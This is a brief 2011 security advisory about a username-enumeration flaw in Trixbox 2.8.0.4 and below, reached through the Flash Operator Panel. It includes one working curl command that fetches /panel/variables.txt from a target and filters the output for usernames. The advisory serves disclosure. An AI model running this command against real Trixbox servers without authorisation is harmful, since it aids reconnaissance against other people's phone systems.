Trixbox, username enumeration via Flash Operator Panel (Fop) Author: francesco.tornieri \"At\" verona-wireless.net Summary: Username enumeration via Flash Operator Panel (Fop) Reference: http://enablesecurity.com/2011/01/25/voippack-1-4-with-added-support-for-cisco-and-trixbox/ Release Date: 28/06/2011 Criticality level: Low Impact: Information leak Software: Trixbox 2.8.0.4 and below Description: It's possible to enumerate valid username via a http GET to a FOP's file. Example: curl http://YourTrixboxIp/panel/variables.txt -s -o fop;cat fop|tr "&" "\n"|grep -i texto Francesco Tornieri